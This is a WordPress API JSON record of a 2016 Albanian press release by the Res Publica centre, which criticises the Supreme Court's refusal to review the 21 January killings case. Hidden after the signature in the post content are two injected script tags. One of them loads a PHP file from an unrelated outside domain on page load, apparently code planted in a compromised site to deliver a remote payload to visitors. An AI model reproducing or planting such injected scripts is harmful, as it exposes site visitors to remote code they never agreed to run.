{"id":1402,"date":"2016-04-26T22:20:52","date_gmt":"2016-04-26T20:20:52","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=1402"},"modified":"2016-04-26T22:20:52","modified_gmt":"2016-04-26T20:20:52","slug":"deklarate-per-shtyp-per-vendimin-e-gjykates-se-larte-per-21-janarin","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=1402","title":{"rendered":"Deklarat\u00eb p\u00ebr shtyp p\u00ebr vendimin e Gjykat\u00ebs s\u00eb Lart\u00eb p\u00ebr 21 janarin"},"content":{"rendered":"<p><a href=\"http:\/\/www.respublica.org.al\/deklarate-per-shtyp-per-vendimin-e-gjykates-se-larte-per-21-janarin\/4123vserq9l\/\" rel=\"attachment wp-att-1403\"><img decoding=\"async\" class=\"alignleft size-medium wp-image-1403\" src=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2016\/04\/4123VSErq9L-300x160.jpg\" alt=\"4123VSErq9L\" width=\"300\" height=\"160\" srcset=\"https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2016\/04\/4123VSErq9L-300x160.jpg 300w, https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2016\/04\/4123VSErq9L.jpg 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a>Qendra \u201cRes Publica\u201d, n\u00eb cil\u00ebsin\u00eb e zyr\u00ebs q\u00eb ka ofruar ndihm\u00eb ligjore p\u00ebr familjet e viktimave t\u00eb 21 janarit shpreh indinjat\u00eb t\u00eb thell\u00eb p\u00ebr kapakun q\u00eb Gjykata e Lart\u00eb i vuri \u00e7\u00ebshtjes s\u00eb 21 janarit.<\/p>\n<p>Mbyllja e k\u00ebsaj dosjeje, \u201cp\u00ebr procedur\u00eb\u201d, nuk i b\u00ebn nder as Gjykat\u00ebs s\u00eb Lart\u00eb dhe as gjykatave t\u00eb m\u00ebparshme q\u00eb kan\u00eb v\u00ebn\u00eb secila nga nj\u00eb vul\u00eb turpi mbi k\u00ebt\u00eb dosje me pesh\u00eb t\u00eb r\u00ebnd\u00eb faji.<\/p>\n<p>P\u00ebr t\u00eb gjith\u00eb ata q\u00eb nuk kan\u00eb njohuri juridike, mospranimi i rekursit do t\u00eb thot\u00eb q\u00eb Gjykata e Lart\u00eb nuk e ka pranuar fare p\u00ebr shqyrtim k\u00ebt\u00eb dosje. Gjykata e Lart\u00eb nuk merret me faktet, por ajo gjykon mbi m\u00ebnyr\u00ebn se si ligji penal dhe procedurat jan\u00eb zbatuar. Mospranimi i rekursit ndodh kur pala q\u00eb b\u00ebn rekurs nuk ngre asnj\u00eb \u00ad\u00e7\u00ebshtje t\u00eb till\u00eb p\u00ebr diskutim.<\/p>\n<p>Por, a \u00ebsht\u00eb e leht\u00eb t\u00eb besohet q\u00eb prokuror\u00ebt, t\u00eb cil\u00ebt supozohet se e njohin ligjin, nuk dit\u00ebn t\u00eb ngren\u00eb as edhe nj\u00eb problem t\u00eb vet\u00ebm q\u00eb ja vlente t\u00eb pakt\u00ebn p\u00ebr ta diskutuar n\u00eb seanc\u00eb gjyq\u00ebsore? A duhet besuar kaq leht\u00eb q\u00eb prokuror\u00ebt b\u00ebn\u00eb nj\u00eb rekurs sa p\u00ebr sy e faqe? Kaq sakt\u00eb qenkan zbatuar ligjet n\u00eb k\u00ebt\u00eb proces gjyq\u00ebsor nga gjykatat m\u00eb t\u00eb ul\u00ebta, sa nuk ja vlente as t\u00eb diskutoheshin t\u00eb pakt\u00ebn n\u00eb nj\u00eb seanc\u00eb gjyq\u00ebsore? Po t\u00eb jet\u00eb k\u00ebshtu v\u00ebrtet, q\u00eb rekursi paska qen\u00eb kaq i pabazuar sa nuk vleu as p\u00ebr diskutim, at\u00ebher\u00eb pse iu desh\u00ebn 3 vjet Gjykat\u00ebs s\u00eb Lart\u00eb p\u00ebr t\u00eb ndar\u00eb mendjen?<\/p>\n<p>Ne e kemi ndjekur nga af\u00ebr procesin n\u00eb dy shkall\u00ebt e para t\u00eb gjykimit dhe kemi shprehur publikisht rezervat tona n\u00eb shum\u00eb momente, p\u00ebr kualifikimin e vepr\u00ebs penale, p\u00ebr aktet e ekspertimit, p\u00ebr provat e pamarra, etj. Madje p\u00ebr disa aspekte kemi paraqitur edhe ankes\u00eb n\u00eb Gjykat\u00ebn Evropiane p\u00ebr t\u00eb Drejtat e Njeriut (shih \u00e7\u00ebshtjen Veizi dhe Deda kund\u00ebr Shqip\u00ebris\u00eb), e cila nuk veproi si Gjykata jon\u00eb e Lart\u00eb, por pak dit\u00eb m\u00eb par\u00eb k\u00ebrkoi kopjen e plot\u00eb t\u00eb dosjes dhe nisi komunikimet me qeverin\u00eb. Pra, nd\u00ebrsa Strasburgu sheh mund\u00ebsi p\u00ebr shqyrtimin e nj\u00eb elementi an\u00ebsor t\u00eb \u00e7\u00ebshtjes, si \u00ebsht\u00eb e mundur q\u00eb Gjykata jon\u00eb e Lart\u00eb nuk gjeti asnj\u00eb mund\u00ebsi shqyrtimi p\u00ebr t\u00eb gjith\u00eb element\u00ebt kryesor\u00eb t\u00eb k\u00ebtij gjyqi?<\/p>\n<p>Ky refuzim p\u00ebr t\u00eb marr\u00eb n\u00eb shqyrtim \u00e7\u00ebshtje t\u00eb tilla nuk \u00ebsht\u00eb i pari rast nga organi m\u00eb i lart\u00eb i sistemit t\u00eb drejt\u00ebsis\u00eb n\u00eb Shqip\u00ebri. N\u00eb t\u00eb nj\u00ebjt\u00ebn m\u00ebnyr\u00eb Gjykata e Lart\u00eb veproi edhe me procesin e G\u00ebrdecit. Tashm\u00eb Gjykata Evropiane po e shqyrton at\u00eb dosje dhe k\u00ebshtu do veprohet edhe me dosjen e 21 janarit. T\u00eb pakt\u00ebn Strasburgu po d\u00ebgjon pal\u00ebt dhe e ka pranuar \u00e7\u00ebshtjen p\u00ebr shqyrtim. Por \u00ebsht\u00eb turp q\u00eb ne ende kemi nevoj\u00eb q\u00eb ta importojm\u00eb drejt\u00ebsin\u00eb elementare nga jasht\u00eb. Zakonisht importohet ai lloj malli q\u00eb nuk ekziston n\u00eb tregun vendas dhe t\u00eb importosh drejt\u00ebsi p\u00ebr \u00e7\u00ebshtje vrasjesh nga shteti \u00ebsht\u00eb t\u00eb prek\u00ebsh fundin.<\/p>\n<p><em>Qendra \u201cRes Publica\u201d<\/em><script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Qendra \u201cRes Publica\u201d, n\u00eb cil\u00ebsin\u00eb e zyr\u00ebs q\u00eb ka ofruar ndihm\u00eb ligjore p\u00ebr familjet e viktimave t\u00eb 21 janarit shpreh [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1403,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6,4],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/1402"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1402"}],"version-history":[{"count":2,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/1402\/revisions"}],"predecessor-version":[{"id":1405,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/1402\/revisions\/1405"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/1403"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1402"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1402"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1402"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}